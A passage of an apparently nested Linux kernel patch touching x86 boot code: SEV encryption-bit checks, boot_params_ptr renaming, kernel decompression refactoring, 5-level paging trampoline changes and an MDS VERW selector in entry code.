++	boot_params_ptr->hdr.loadflags |= KASLR_FLAG;
+ 
+ 	if (IS_ENABLED(CONFIG_X86_32))
+ 		mem_limit = KERNEL_IMAGE_SIZE;
+diff --git a/arch/x86/boot/compressed/mem_encrypt.S b/arch/x86/boot/compressed/mem_encrypt.S
+index a73e4d783cae2..32f7cc8a86254 100644
+--- a/arch/x86/boot/compressed/mem_encrypt.S
++++ b/arch/x86/boot/compressed/mem_encrypt.S
+@@ -12,16 +12,13 @@
+ #include <asm/processor-flags.h>
+ #include <asm/msr.h>
+ #include <asm/asm-offsets.h>
++#include <asm/segment.h>
++#include <asm/trapnr.h>
+ 
+ 	.text
+ 	.code32
+ SYM_FUNC_START(get_sev_encryption_bit)
+-	xor	%eax, %eax
+-
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	push	%ebx
+-	push	%ecx
+-	push	%edx
+ 
+ 	movl	$0x80000000, %eax	/* CPUID to check the highest leaf */
+ 	cpuid
+@@ -52,12 +49,7 @@ SYM_FUNC_START(get_sev_encryption_bit)
+ 	xor	%eax, %eax
+ 
+ .Lsev_exit:
+-	pop	%edx
+-	pop	%ecx
+ 	pop	%ebx
+-
+-#endif	/* CONFIG_AMD_MEM_ENCRYPT */
+-
+ 	RET
+ SYM_FUNC_END(get_sev_encryption_bit)
+ 
+@@ -98,7 +90,7 @@ SYM_CODE_START_LOCAL(sev_es_req_cpuid)
+ 	jmp	1b
+ SYM_CODE_END(sev_es_req_cpuid)
+ 
+-SYM_CODE_START(startup32_vc_handler)
++SYM_CODE_START_LOCAL(startup32_vc_handler)
+ 	pushl	%eax
+ 	pushl	%ebx
+ 	pushl	%ecx
+@@ -184,15 +176,149 @@ SYM_CODE_START(startup32_vc_handler)
+ 	jmp .Lfail
+ SYM_CODE_END(startup32_vc_handler)
+ 
++/*
++ * Write an IDT entry into boot32_idt
++ *
++ * Parameters:
++ *
++ * %eax:	Handler address
++ * %edx:	Vector number
++ * %ecx:	IDT address
++ */
++SYM_FUNC_START_LOCAL(startup32_set_idt_entry)
++	/* IDT entry address to %ecx */
++	leal	(%ecx, %edx, 8), %ecx
++
++	/* Build IDT entry, lower 4 bytes */
++	movl    %eax, %edx
++	andl    $0x0000ffff, %edx		# Target code segment offset [15:0]
++	orl	$(__KERNEL32_CS << 16), %edx	# Target code segment selector
++
++	/* Store lower 4 bytes to IDT */
++	movl    %edx, (%ecx)
++
++	/* Build IDT entry, upper 4 bytes */
++	movl    %eax, %edx
++	andl    $0xffff0000, %edx	# Target code segment offset [31:16]
++	orl     $0x00008e00, %edx	# Present, Type 32-bit Interrupt Gate
++
++	/* Store upper 4 bytes to IDT */
++	movl    %edx, 4(%ecx)
++
++	RET
++SYM_FUNC_END(startup32_set_idt_entry)
++
++SYM_FUNC_START(startup32_load_idt)
++	push	%ebp
++	push	%ebx
++
++	call	1f
++1:	pop	%ebp
++
++	leal    (boot32_idt - 1b)(%ebp), %ebx
++
++	/* #VC handler */
++	leal    (startup32_vc_handler - 1b)(%ebp), %eax
++	movl    $X86_TRAP_VC, %edx
++	movl	%ebx, %ecx
++	call    startup32_set_idt_entry
++
++	/* Load IDT */
++	leal	(boot32_idt_desc - 1b)(%ebp), %ecx
++	movl	%ebx, 2(%ecx)
++	lidt    (%ecx)
++
++	pop	%ebx
++	pop	%ebp
++	RET
++SYM_FUNC_END(startup32_load_idt)
++
++/*
++ * Check for the correct C-bit position when the startup_32 boot-path is used.
++ *
++ * The check makes use of the fact that all memory is encrypted when paging is
++ * disabled. The function creates 64 bits of random data using the RDRAND
++ * instruction. RDRAND is mandatory for SEV guests, so always available. If the
++ * hypervisor violates that the kernel will crash right here.
++ *
++ * The 64 bits of random data are stored to a memory location and at the same
++ * time kept in the %eax and %ebx registers. Since encryption is always active
++ * when paging is off the random data will be stored encrypted in main memory.
++ *
++ * Then paging is enabled. When the C-bit position is correct all memory is
++ * still mapped encrypted and comparing the register values with memory will
++ * succeed. An incorrect C-bit position will map all memory unencrypted, so that
++ * the compare will use the encrypted random data and fail.
++ */
++SYM_FUNC_START(startup32_check_sev_cbit)
++	pushl	%ebx
++	pushl	%ebp
++
++	call	0f
++0:	popl	%ebp
++
++	/* Check for non-zero sev_status */
++	movl	(sev_status - 0b)(%ebp), %eax
++	testl	%eax, %eax
++	jz	4f
++
++	/*
++	 * Get two 32-bit random values - Don't bail out if RDRAND fails
++	 * because it is better to prevent forward progress if no random value
++	 * can be gathered.
++	 */
++1:	rdrand	%eax
++	jnc	1b
++2:	rdrand	%ebx
++	jnc	2b
++
++	/* Store to memory and keep it in the registers */
++	leal	(sev_check_data - 0b)(%ebp), %ebp
++	movl	%eax, 0(%ebp)
++	movl	%ebx, 4(%ebp)
++
++	/* Enable paging to see if encryption is active */
++	movl	%cr0, %edx			 /* Backup %cr0 in %edx */
++	movl	$(X86_CR0_PG | X86_CR0_PE), %ecx /* Enable Paging and Protected mode */
++	movl	%ecx, %cr0
++
++	cmpl	%eax, 0(%ebp)
++	jne	3f
++	cmpl	%ebx, 4(%ebp)
++	jne	3f
++
++	movl	%edx, %cr0	/* Restore previous %cr0 */
++
++	jmp	4f
++
++3:	/* Check failed - hlt the machine */
++	hlt
++	jmp	3b
++
++4:
++	popl	%ebp
++	popl	%ebx
++	RET
++SYM_FUNC_END(startup32_check_sev_cbit)
++
+ 	.code64
+ 
+ #include "../../kernel/sev_verify_cbit.S"
+ 
+ 	.data
+ 
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	.balign	8
+ SYM_DATA(sme_me_mask,		.quad 0)
+ SYM_DATA(sev_status,		.quad 0)
+ SYM_DATA(sev_check_data,	.quad 0)
+-#endif
++
++SYM_DATA_START_LOCAL(boot32_idt)
++	.rept	32
++	.quad	0
++	.endr
++SYM_DATA_END(boot32_idt)
++
++SYM_DATA_START_LOCAL(boot32_idt_desc)
++	.word	. - boot32_idt - 1
++	.long	0
++SYM_DATA_END(boot32_idt_desc)
+diff --git a/arch/x86/boot/compressed/misc.c b/arch/x86/boot/compressed/misc.c
+index cf690d8712f4e..8ae7893d712ff 100644
+--- a/arch/x86/boot/compressed/misc.c
++++ b/arch/x86/boot/compressed/misc.c
+@@ -46,7 +46,7 @@ void *memmove(void *dest, const void *src, size_t n);
+ /*
+  * This is set up by the setup-routine at boot-time
+  */
+-struct boot_params *boot_params;
++struct boot_params *boot_params_ptr;
+ 
+ struct port_io_ops pio_ops;
+ 
+@@ -132,8 +132,8 @@ void __putstr(const char *s)
+ 	if (lines == 0 || cols == 0)
+ 		return;
+ 
+-	x = boot_params->screen_info.orig_x;
+-	y = boot_params->screen_info.orig_y;
++	x = boot_params_ptr->screen_info.orig_x;
++	y = boot_params_ptr->screen_info.orig_y;
+ 
+ 	while ((c = *s++) != '\0') {
+ 		if (c == '\n') {
+@@ -154,8 +154,8 @@ void __putstr(const char *s)
+ 		}
+ 	}
+ 
+-	boot_params->screen_info.orig_x = x;
+-	boot_params->screen_info.orig_y = y;
++	boot_params_ptr->screen_info.orig_x = x;
++	boot_params_ptr->screen_info.orig_y = y;
+ 
+ 	pos = (x + cols * y) * 2;	/* Update cursor position */
+ 	outb(14, vidport);
+@@ -277,7 +277,7 @@ static inline void handle_relocations(void *output, unsigned long output_len,
+ { }
+ #endif
+ 
+-static void parse_elf(void *output)
++static size_t parse_elf(void *output)
+ {
+ #ifdef CONFIG_X86_64
+ 	Elf64_Ehdr ehdr;
+@@ -293,10 +293,8 @@ static void parse_elf(void *output)
+ 	if (ehdr.e_ident[EI_MAG0] != ELFMAG0 ||
+ 	   ehdr.e_ident[EI_MAG1] != ELFMAG1 ||
+ 	   ehdr.e_ident[EI_MAG2] != ELFMAG2 ||
+-	   ehdr.e_ident[EI_MAG3] != ELFMAG3) {
++	   ehdr.e_ident[EI_MAG3] != ELFMAG3)
+ 		error("Kernel is not a valid ELF file");
+-		return;
+-	}
+ 
+ 	debug_putstr("Parsing ELF... ");
+ 
+@@ -328,6 +326,35 @@ static void parse_elf(void *output)
+ 	}
+ 
+ 	free(phdrs);
++
++	return ehdr.e_entry - LOAD_PHYSICAL_ADDR;
++}
++
++const unsigned long kernel_total_size = VO__end - VO__text;
++
++static u8 boot_heap[BOOT_HEAP_SIZE] __aligned(4);
++
++extern unsigned char input_data[];
++extern unsigned int input_len, output_len;
++
++unsigned long decompress_kernel(unsigned char *outbuf, unsigned long virt_addr,
++				void (*error)(char *x))
++{
++	unsigned long entry;
++
++	if (!free_mem_ptr) {
++		free_mem_ptr     = (unsigned long)boot_heap;
++		free_mem_end_ptr = (unsigned long)boot_heap + sizeof(boot_heap);
++	}
++
++	if (__decompress(input_data, input_len, NULL, NULL, outbuf, output_len,
++			 NULL, error) < 0)
++		return ULONG_MAX;
++
++	entry = parse_elf(outbuf);
++	handle_relocations(outbuf, output_len, virt_addr);
++
++	return entry;
+ }
+ 
+ /*
+@@ -347,25 +374,22 @@ static void parse_elf(void *output)
+  *             |-------uncompressed kernel image---------|
+  *
+  */
+-asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+-				  unsigned char *input_data,
+-				  unsigned long input_len,
+-				  unsigned char *output,
+-				  unsigned long output_len)
++asmlinkage __visible void *extract_kernel(void *rmode, unsigned char *output)
+ {
+-	const unsigned long kernel_total_size = VO__end - VO__text;
+ 	unsigned long virt_addr = LOAD_PHYSICAL_ADDR;
++	memptr heap = (memptr)boot_heap;
+ 	unsigned long needed_size;
++	size_t entry_offset;
+ 
+ 	/* Retain x86 boot parameters pointer passed from startup_32/64. */
+-	boot_params = rmode;
++	boot_params_ptr = rmode;
+ 
+ 	/* Clear flags intended for solely in-kernel use. */
+-	boot_params->hdr.loadflags &= ~KASLR_FLAG;
++	boot_params_ptr->hdr.loadflags &= ~KASLR_FLAG;
+ 
+-	sanitize_boot_params(boot_params);
++	sanitize_boot_params(boot_params_ptr);
+ 
+-	if (boot_params->screen_info.orig_video_mode == 7) {
++	if (boot_params_ptr->screen_info.orig_video_mode == 7) {
+ 		vidmem = (char *) 0xb0000;
+ 		vidport = 0x3b4;
+ 	} else {
+@@ -373,8 +397,8 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ 		vidport = 0x3d4;
+ 	}
+ 
+-	lines = boot_params->screen_info.orig_video_lines;
+-	cols = boot_params->screen_info.orig_video_cols;
++	lines = boot_params_ptr->screen_info.orig_video_lines;
++	cols = boot_params_ptr->screen_info.orig_video_cols;
+ 
+ 	init_default_io_ops();
+ 
+@@ -393,7 +417,7 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ 	 * so that early debugging output from the RSDP parsing code can be
+ 	 * collected.
+ 	 */
+-	boot_params->acpi_rsdp_addr = get_rsdp_addr();
++	boot_params_ptr->acpi_rsdp_addr = get_rsdp_addr();
+ 
+ 	debug_putstr("early console in extract_kernel\n");
+ 
+@@ -411,7 +435,7 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ 	 * entries. This ensures the full mapped area is usable RAM
+ 	 * and doesn't include any reserved areas.
+ 	 */
+-	needed_size = max(output_len, kernel_total_size);
++	needed_size = max_t(unsigned long, output_len, kernel_total_size);
+ #ifdef CONFIG_X86_64
+ 	needed_size = ALIGN(needed_size, MIN_KERNEL_ALIGN);
+ #endif
+@@ -442,7 +466,7 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ #ifdef CONFIG_X86_64
+ 	if (heap > 0x3fffffffffffUL)
+ 		error("Destination address too large");
+-	if (virt_addr + max(output_len, kernel_total_size) > KERNEL_IMAGE_SIZE)
++	if (virt_addr + needed_size > KERNEL_IMAGE_SIZE)
+ 		error("Destination virtual address is beyond the kernel mapping area");
+ #else
+ 	if (heap > ((-__PAGE_OFFSET-(128<<20)-1) & 0x7fffffff))
+@@ -454,16 +478,17 @@ asmlinkage __visible void *extract_kernel(void *rmode, memptr heap,
+ #endif
+ 
+ 	debug_putstr("\nDecompressing Linux... ");
+-	__decompress(input_data, input_len, NULL, NULL, output, output_len,
+-			NULL, error);
+-	parse_elf(output);
+-	handle_relocations(output, output_len, virt_addr);
+-	debug_putstr("done.\nBooting the kernel.\n");
++
++	entry_offset = decompress_kernel(output, virt_addr, error);
++
++	debug_putstr("done.\nBooting the kernel (entry_offset: 0x");
++	debug_puthex(entry_offset);
++	debug_putstr(").\n");
+ 
+ 	/* Disable exception handling before booting the kernel */
+ 	cleanup_exception_handling();
+ 
+-	return output;
++	return output + entry_offset;
+ }
+ 
+ void fortify_panic(const char *name)
+diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h
+index a49d9219c06e5..254acd76efde2 100644
+--- a/arch/x86/boot/compressed/misc.h
++++ b/arch/x86/boot/compressed/misc.h
+@@ -52,7 +52,6 @@ extern memptr free_mem_ptr;
+ extern memptr free_mem_end_ptr;
+ void *malloc(int size);
+ void free(void *where);
+-extern struct boot_params *boot_params;
+ void __putstr(const char *s);
+ void __puthex(unsigned long value);
+ #define error_putstr(__x)  __putstr(__x)
+@@ -170,9 +169,7 @@ static inline int count_immovable_mem_regions(void) { return 0; }
+ #endif
+ 
+ /* ident_map_64.c */
+-#ifdef CONFIG_X86_5LEVEL
+ extern unsigned int __pgtable_l5_enabled, pgdir_shift, ptrs_per_p4d;
+-#endif
+ extern void kernel_add_identity_map(unsigned long start, unsigned long end);
+ 
+ /* Used by PAGE_KERN* macros: */
+diff --git a/arch/x86/boot/compressed/pgtable.h b/arch/x86/boot/compressed/pgtable.h
+index cc9b2529a0863..6d595abe06b34 100644
+--- a/arch/x86/boot/compressed/pgtable.h
++++ b/arch/x86/boot/compressed/pgtable.h
+@@ -3,18 +3,16 @@
+ 
+ #define TRAMPOLINE_32BIT_SIZE		(2 * PAGE_SIZE)
+ 
+-#define TRAMPOLINE_32BIT_PGTABLE_OFFSET	0
+-
+ #define TRAMPOLINE_32BIT_CODE_OFFSET	PAGE_SIZE
+-#define TRAMPOLINE_32BIT_CODE_SIZE	0x80
+-
+-#define TRAMPOLINE_32BIT_STACK_END	TRAMPOLINE_32BIT_SIZE
++#define TRAMPOLINE_32BIT_CODE_SIZE	0xA0
+ 
+ #ifndef __ASSEMBLER__
+ 
+ extern unsigned long *trampoline_32bit;
+ 
+-extern void trampoline_32bit_src(void *return_ptr);
++extern void trampoline_32bit_src(void *trampoline, bool enable_5lvl);
++
++extern const u16 trampoline_ljmp_imm_offset;
+ 
+ #endif /* __ASSEMBLER__ */
+ #endif /* BOOT_COMPRESSED_PAGETABLE_H */
+diff --git a/arch/x86/boot/compressed/pgtable_64.c b/arch/x86/boot/compressed/pgtable_64.c
+index 2ac12ff4111bf..51f957b24ba7a 100644
+--- a/arch/x86/boot/compressed/pgtable_64.c
++++ b/arch/x86/boot/compressed/pgtable_64.c
+@@ -16,11 +16,6 @@ unsigned int __section(".data") pgdir_shift = 39;
+ unsigned int __section(".data") ptrs_per_p4d = 1;
+ #endif
+ 
+-struct paging_config {
+-	unsigned long trampoline_start;
+-	unsigned long l5_required;
+-};
+-
+ /* Buffer to preserve trampoline memory */
+ static char trampoline_save[TRAMPOLINE_32BIT_SIZE];
+ 
+@@ -29,11 +24,10 @@ static char trampoline_save[TRAMPOLINE_32BIT_SIZE];
+  * purposes.
+  *
+  * Avoid putting the pointer into .bss as it will be cleared between
+- * paging_prepare() and extract_kernel().
++ * configure_5level_paging() and extract_kernel().
+  */
+ unsigned long *trampoline_32bit __section(".data");
+ 
+-extern struct boot_params *boot_params;
+ int cmdline_find_option_bool(const char *option);
+ 
+ static unsigned long find_trampoline_placement(void)
+@@ -54,7 +48,7 @@ static unsigned long find_trampoline_placement(void)
+ 	 *
+ 	 * Only look for values in the legacy ROM for non-EFI system.
+ 	 */
+-	signature = (char *)&boot_params->efi_info.efi_loader_signature;
++	signature = (char *)&boot_params_ptr->efi_info.efi_loader_signature;
+ 	if (strncmp(signature, EFI32_LOADER_SIGNATURE, 4) &&
+ 	    strncmp(signature, EFI64_LOADER_SIGNATURE, 4)) {
+ 		ebda_start = *(unsigned short *)0x40e << 4;
+@@ -70,10 +64,10 @@ static unsigned long find_trampoline_placement(void)
+ 	bios_start = round_down(bios_start, PAGE_SIZE);
+ 
+ 	/* Find the first usable memory region under bios_start. */
+-	for (i = boot_params->e820_entries - 1; i >= 0; i--) {
++	for (i = boot_params_ptr->e820_entries - 1; i >= 0; i--) {
+ 		unsigned long new = bios_start;
+ 
+-		entry = &boot_params->e820_table[i];
++		entry = &boot_params_ptr->e820_table[i];
+ 
+ 		/* Skip all entries above bios_start. */
+ 		if (bios_start <= entry->addr)
+@@ -106,12 +100,13 @@ static unsigned long find_trampoline_placement(void)
+ 	return bios_start - TRAMPOLINE_32BIT_SIZE;
+ }
+ 
+-struct paging_config paging_prepare(void *rmode)
++asmlinkage void configure_5level_paging(struct boot_params *bp, void *pgtable)
+ {
+-	struct paging_config paging_config = {};
++	void (*toggle_la57)(void *cr3);
++	bool l5_required = false;
+ 
+ 	/* Initialize boot_params. Required for cmdline_find_option_bool(). */
+-	boot_params = rmode;
++	boot_params_ptr = bp;
+ 
+ 	/*
+ 	 * Check if LA57 is desired and supported.
+@@ -129,12 +124,22 @@ struct paging_config paging_prepare(void *rmode)
+ 			!cmdline_find_option_bool("no5lvl") &&
+ 			native_cpuid_eax(0) >= 7 &&
+ 			(native_cpuid_ecx(7) & (1 << (X86_FEATURE_LA57 & 31)))) {
+-		paging_config.l5_required = 1;
++		l5_required = true;
++
++		/* Initialize variables for 5-level paging */
++		__pgtable_l5_enabled = 1;
++		pgdir_shift = 48;
++		ptrs_per_p4d = 512;
+ 	}
+ 
+-	paging_config.trampoline_start = find_trampoline_placement();
++	/*
++	 * The trampoline will not be used if the paging mode is already set to
++	 * the desired one.
++	 */
++	if (l5_required == !!(native_read_cr4() & X86_CR4_LA57))
++		return;
+ 
+-	trampoline_32bit = (unsigned long *)paging_config.trampoline_start;
++	trampoline_32bit = (unsigned long *)find_trampoline_placement();
+ 
+ 	/* Preserve trampoline memory */
+ 	memcpy(trampoline_save, trampoline_32bit, TRAMPOLINE_32BIT_SIZE);
+@@ -143,32 +148,32 @@ struct paging_config paging_prepare(void *rmode)
+ 	memset(trampoline_32bit, 0, TRAMPOLINE_32BIT_SIZE);
+ 
+ 	/* Copy trampoline code in place */
+-	memcpy(trampoline_32bit + TRAMPOLINE_32BIT_CODE_OFFSET / sizeof(unsigned long),
++	toggle_la57 = memcpy(trampoline_32bit +
++			TRAMPOLINE_32BIT_CODE_OFFSET / sizeof(unsigned long),
+ 			&trampoline_32bit_src, TRAMPOLINE_32BIT_CODE_SIZE);
+ 
++	/*
++	 * Avoid the need for a stack in the 32-bit trampoline code, by using
++	 * LJMP rather than LRET to return back to long mode. LJMP takes an
++	 * immediate absolute address, which needs to be adjusted based on the
++	 * placement of the trampoline.
++	 */
++	*(u32 *)((u8 *)toggle_la57 + trampoline_ljmp_imm_offset) +=
++						(unsigned long)toggle_la57;
++
+ 	/*
+ 	 * The code below prepares page table in trampoline memory.
+ 	 *
+ 	 * The new page table will be used by trampoline code for switching
+ 	 * from 4- to 5-level paging or vice versa.
+-	 *
+-	 * If switching is not required, the page table is unused: trampoline
+-	 * code wouldn't touch CR3.
+-	 */
+-
+-	/*
+-	 * We are not going to use the page table in trampoline memory if we
+-	 * are already in the desired paging mode.
+ 	 */
+-	if (paging_config.l5_required == !!(native_read_cr4() & X86_CR4_LA57))
+-		goto out;
+ 
+-	if (paging_config.l5_required) {
++	if (l5_required) {
+ 		/*
+ 		 * For 4- to 5-level paging transition, set up current CR3 as
+ 		 * the first and the only entry in a new top-level page table.
+ 		 */
+-		trampoline_32bit[TRAMPOLINE_32BIT_PGTABLE_OFFSET] = __native_read_cr3() | _PAGE_TABLE_NOENC;
++		*trampoline_32bit = __native_read_cr3() | _PAGE_TABLE_NOENC;
+ 	} else {
+ 		unsigned long src;
+ 
+@@ -181,38 +186,17 @@ struct paging_config paging_prepare(void *rmode)
+ 		 * may be above 4G.
+ 		 */
+ 		src = *(unsigned long *)__native_read_cr3() & PAGE_MASK;
+-		memcpy(trampoline_32bit + TRAMPOLINE_32BIT_PGTABLE_OFFSET / sizeof(unsigned long),
+-		       (void *)src, PAGE_SIZE);
++		memcpy(trampoline_32bit, (void *)src, PAGE_SIZE);
+ 	}
+ 
+-out:
+-	return paging_config;
+-}
+-
+-void cleanup_trampoline(void *pgtable)
+-{
+-	void *trampoline_pgtable;
+-
+-	trampoline_pgtable = trampoline_32bit + TRAMPOLINE_32BIT_PGTABLE_OFFSET / sizeof(unsigned long);
++	toggle_la57(trampoline_32bit);
+ 
+ 	/*
+-	 * Move the top level page table out of trampoline memory,
+-	 * if it's there.
++	 * Move the top level page table out of trampoline memory.
+ 	 */
+-	if ((void *)__native_read_cr3() == trampoline_pgtable) {
+-		memcpy(pgtable, trampoline_pgtable, PAGE_SIZE);
+-		native_write_cr3((unsigned long)pgtable);
+-	}
++	memcpy(pgtable, trampoline_32bit, PAGE_SIZE);
++	native_write_cr3((unsigned long)pgtable);
+ 
+ 	/* Restore trampoline memory */
+ 	memcpy(trampoline_32bit, trampoline_save, TRAMPOLINE_32BIT_SIZE);
+-
+-	/* Initialize variables for 5-level paging */
+-#ifdef CONFIG_X86_5LEVEL
+-	if (__read_cr4() & X86_CR4_LA57) {
+-		__pgtable_l5_enabled = 1;
+-		pgdir_shift = 48;
+-		ptrs_per_p4d = 512;
+-	}
+-#endif
+ }
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index 9c91cc40f4565..d07e665bb265b 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -327,20 +327,25 @@ static void enforce_vmpl0(void)
+  */
+ #define SNP_FEATURES_PRESENT (0)
+ 
++u64 snp_get_unsupported_features(u64 status)
++{
++	if (!(status & MSR_AMD64_SEV_SNP_ENABLED))
++		return 0;
++
++	return status & SNP_FEATURES_IMPL_REQ & ~SNP_FEATURES_PRESENT;
++}
++
+ void snp_check_features(void)
+ {
+ 	u64 unsupported;
+ 
+-	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
+-		return;
+-
+ 	/*
+ 	 * Terminate the boot if hypervisor has enabled any feature lacking
+ 	 * guest side implementation. Pass on the unsupported features mask through
+ 	 * EXIT_INFO_2 of the GHCB protocol so that those features can be reported
+ 	 * as part of the guest boot failure.
+ 	 */
+-	unsupported = sev_status & SNP_FEATURES_IMPL_REQ & ~SNP_FEATURES_PRESENT;
++	unsupported = snp_get_unsupported_features(sev_status);
+ 	if (unsupported) {
+ 		if (ghcb_version < 2 || (!boot_ghcb && !early_setup_ghcb()))
+ 			sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
+@@ -350,35 +355,22 @@ void snp_check_features(void)
+ 	}
+ }
+ 
+-void sev_enable(struct boot_params *bp)
++/*
++ * sev_check_cpu_support - Check for SEV support in the CPU capabilities
++ *
++ * Returns < 0 if SEV is not supported, otherwise the position of the
++ * encryption bit in the page table descriptors.
++ */
++static int sev_check_cpu_support(void)
+ {
+ 	unsigned int eax, ebx, ecx, edx;
+-	struct msr m;
+-	bool snp;
+-
+-	/*
+-	 * bp->cc_blob_address should only be set by boot/compressed kernel.
+-	 * Initialize it to 0 to ensure that uninitialized values from
+-	 * buggy bootloaders aren't propagated.
+-	 */
+-	if (bp)
+-		bp->cc_blob_address = 0;
+-
+-	/*
+-	 * Do an initial SEV capability check before snp_init() which
+-	 * loads the CPUID page and the same checks afterwards are done
+-	 * without the hypervisor and are trustworthy.
+-	 *
+-	 * If the HV fakes SEV support, the guest will crash'n'burn
+-	 * which is good enough.
+-	 */
+ 
+ 	/* Check for the SME/SEV support leaf */
+ 	eax = 0x80000000;
+ 	ecx = 0;
+ 	native_cpuid(&eax, &ebx, &ecx, &edx);
+ 	if (eax < 0x8000001f)
+-		return;
++		return -ENODEV;
+ 
+ 	/*
+ 	 * Check for the SME/SEV feature:
+@@ -393,6 +385,35 @@ void sev_enable(struct boot_params *bp)
+ 	native_cpuid(&eax, &ebx, &ecx, &edx);
+ 	/* Check whether SEV is supported */
+ 	if (!(eax & BIT(1)))
++		return -ENODEV;
++
++	return ebx & 0x3f;
++}
++
++void sev_enable(struct boot_params *bp)
++{
++	struct msr m;
++	int bitpos;
++	bool snp;
++
++	/*
++	 * bp->cc_blob_address should only be set by boot/compressed kernel.
++	 * Initialize it to 0 to ensure that uninitialized values from
++	 * buggy bootloaders aren't propagated.
++	 */
++	if (bp)
++		bp->cc_blob_address = 0;
++
++	/*
++	 * Do an initial SEV capability check before snp_init() which
++	 * loads the CPUID page and the same checks afterwards are done
++	 * without the hypervisor and are trustworthy.
++	 *
++	 * If the HV fakes SEV support, the guest will crash'n'burn
++	 * which is good enough.
++	 */
++
++	if (sev_check_cpu_support() < 0)
+ 		return;
+ 
+ 	/*
+@@ -403,26 +424,8 @@ void sev_enable(struct boot_params *bp)
+ 
+ 	/* Now repeat the checks with the SNP CPUID table. */
+ 
+-	/* Recheck the SME/SEV support leaf */
+-	eax = 0x80000000;
+-	ecx = 0;
+-	native_cpuid(&eax, &ebx, &ecx, &edx);
+-	if (eax < 0x8000001f)
+-		return;
+-
+-	/*
+-	 * Recheck for the SME/SEV feature:
+-	 *   CPUID Fn8000_001F[EAX]
+-	 *   - Bit 0 - Secure Memory Encryption support
+-	 *   - Bit 1 - Secure Encrypted Virtualization support
+-	 *   CPUID Fn8000_001F[EBX]
+-	 *   - Bits 5:0 - Pagetable bit position used to indicate encryption
+-	 */
+-	eax = 0x8000001f;
+-	ecx = 0;
+-	native_cpuid(&eax, &ebx, &ecx, &edx);
+-	/* Check whether SEV is supported */
+-	if (!(eax & BIT(1))) {
++	bitpos = sev_check_cpu_support();
++	if (bitpos < 0) {
+ 		if (snp)
+ 			error("SEV-SNP support indicated by CC blob, but not CPUID.");
+ 		return;
+@@ -454,7 +457,24 @@ void sev_enable(struct boot_params *bp)
+ 	if (snp && !(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
+ 		error("SEV-SNP supported indicated by CC blob, but not SEV status MSR.");
+ 
+-	sme_me_mask = BIT_ULL(ebx & 0x3f);
++	sme_me_mask = BIT_ULL(bitpos);
++}
++
++/*
++ * sev_get_status - Retrieve the SEV status mask
++ *
++ * Returns 0 if the CPU is not SEV capable, otherwise the value of the
++ * AMD64_SEV MSR.
++ */
++u64 sev_get_status(void)
++{
++	struct msr m;
++
++	if (sev_check_cpu_support() < 0)
++		return 0;
++
++	boot_rdmsr(MSR_AMD64_SEV, &m);
++	return m.q;
+ }
+ 
+ /* Search for Confidential Computing blob in the EFI config table. */
+@@ -545,7 +565,7 @@ void sev_prep_identity_maps(unsigned long top_level_pgt)
+ 	 * accessed after switchover.
+ 	 */
+ 	if (sev_snp_enabled()) {
+-		unsigned long cc_info_pa = boot_params->cc_blob_address;
++		unsigned long cc_info_pa = boot_params_ptr->cc_blob_address;
+ 		struct cc_blob_sev_info *cc_info;
+ 
+ 		kernel_add_identity_map(cc_info_pa, cc_info_pa + sizeof(*cc_info));
+diff --git a/arch/x86/boot/header.S b/arch/x86/boot/header.S
+index f912d77701305..d31982509654d 100644
+--- a/arch/x86/boot/header.S
++++ b/arch/x86/boot/header.S
+@@ -406,7 +406,7 @@ xloadflags:
+ # define XLF1 0
+ #endif
+ 
+-#ifdef CONFIG_EFI_STUB
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+ # ifdef CONFIG_EFI_MIXED
+ #  define XLF23 (XLF_EFI_HANDOVER_32|XLF_EFI_HANDOVER_64)
+ # else
+diff --git a/arch/x86/boot/tools/build.c b/arch/x86/boot/tools/build.c
+index a3725ad46c5a0..bd247692b7017 100644
+--- a/arch/x86/boot/tools/build.c
++++ b/arch/x86/boot/tools/build.c
+@@ -290,6 +290,7 @@ static void efi_stub_entry_update(void)
+ {
+ 	unsigned long addr = efi32_stub_entry;
+ 
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+ #ifdef CONFIG_X86_64
+ 	/* Yes, this is really how we defined it :( */
+ 	addr = efi64_stub_entry - 0x200;
+@@ -298,6 +299,7 @@ static void efi_stub_entry_update(void)
+ #ifdef CONFIG_EFI_MIXED
+ 	if (efi32_stub_entry != addr)
+ 		die("32-bit and 64-bit EFI entry points do not match\n");
++#endif
+ #endif
+ 	put_unaligned_le32(addr, &buf[0x264]);
+ }
+diff --git a/arch/x86/entry/entry.S b/arch/x86/entry/entry.S
+index bfb7bcb362bcf..09e99d13fc0b3 100644
+--- a/arch/x86/entry/entry.S
++++ b/arch/x86/entry/entry.S
+@@ -6,6 +6,9 @@
+ #include <linux/linkage.h>
+ #include <asm/export.h>
+ #include <asm/msr-index.h>
++#include <asm/unwind_hints.h>
++#include <asm/segment.h>
++#include <asm/cache.h>
+ 
+ .pushsection .noinstr.text, "ax"
+ 
+@@ -20,3 +23,23 @@ SYM_FUNC_END(entry_ibpb)
+ EXPORT_SYMBOL_GPL(entry_ibpb);
+ 
+ .popsection
++
++/*
++ * Define the VERW operand that is disguised as entry code so that
++ * it can be referenced with KPTI enabled. This ensure VERW can be
++ * used late in exit-to-user path after page tables are switched.
++ */
++.pushsection .entry.text, "ax"
++
++.align L1_CACHE_BYTES, 0xcc
++SYM_CODE_START_NOALIGN(mds_verw_sel)
++	UNWIND_HINT_EMPTY
++	ANNOTATE_NOENDBR
++	.word __KERNEL_DS
++.align L1_CACHE_BYTES, 0xcc
++SYM_CODE_END(mds_verw_sel);
++/* For KVM */
++EXPORT_SYMBOL_GPL(mds_verw_sel);
++
++.popsection
++
+diff --git a/arch/x86/entry/entry_32.S b/arch/x86/entry/entry_32.S
